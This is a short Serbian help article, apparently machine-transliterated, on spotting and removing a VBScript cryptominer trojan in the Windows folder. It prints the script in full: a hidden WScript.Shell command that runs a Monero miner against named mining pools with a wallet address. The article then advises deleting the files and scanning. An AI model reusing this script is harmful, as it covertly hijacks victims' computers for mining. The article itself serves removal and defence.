Ако у систему добијате следећу поруку о грешци која се односи на „кдгаудио.вбс“, тада је ваш рачунар највероватније заражен.
Скрипта: Ц: \ виндовс \ кдгаудио.вбсРед: 3
Цхар: 1
Грешка: Систем не може да нађе специфицирану датотеку.
Шифра: 80070002
Извор: (нулл)
Када се уређује са Нотепад-ом, скрипта може садржати ретке као што је доле:
Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -px", 0 Set WShell = Nothing
Ово сигурно изгледа као тројански процесор / цриптоцурренци Минер који не само да успорава рачунар, већ може представљати и безбедносну претњу. Датотеке скрипте ц: \ виндовс \ кдгаудио.вбс и ц: \ виндовс \ сервицецрссср.вбс треба избрисати. То није довољно. Покрените детаљно скенирање користећи малваребитес антималваре, а такође скенирајте са антивирусним софтвером који користите.
Детаљна упутства о уклањању таквих Минер Тројан потражите у водичу малваретипс.цом Како уклонити ЦПУ Минер Тројан из Виндовс-а (Водич за помоћ вирусима) .